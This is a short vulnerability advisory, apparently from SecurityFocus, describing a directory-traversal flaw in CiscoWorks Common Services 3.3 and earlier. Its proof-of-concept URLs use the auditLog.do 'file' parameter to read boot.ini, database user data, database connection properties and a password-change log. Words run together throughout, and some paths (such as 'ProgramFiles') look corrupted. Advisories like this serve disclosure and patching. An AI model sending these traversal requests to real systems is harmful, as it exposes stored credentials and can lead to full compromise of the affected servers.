source: https://www.securityfocus.com/bid/47905/info
CiscoWorksCommonServices is prone toa directory-traversal vulnerability because it fails tosufficiently sanitize user-supplied input.
A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../')togain access toarbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead toa complete compromise of the affected computer.
This issue is being monitored by CiscoBugIDCSCto35577.
CiscoWorksCommonServices3.3 and prior are vulnerable.
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties DB connection info for all databases:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties
Note:When reading large files such as this file, ensure the row limit is adjusted to500for example.DB password change log:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\log\dbpwdChange.log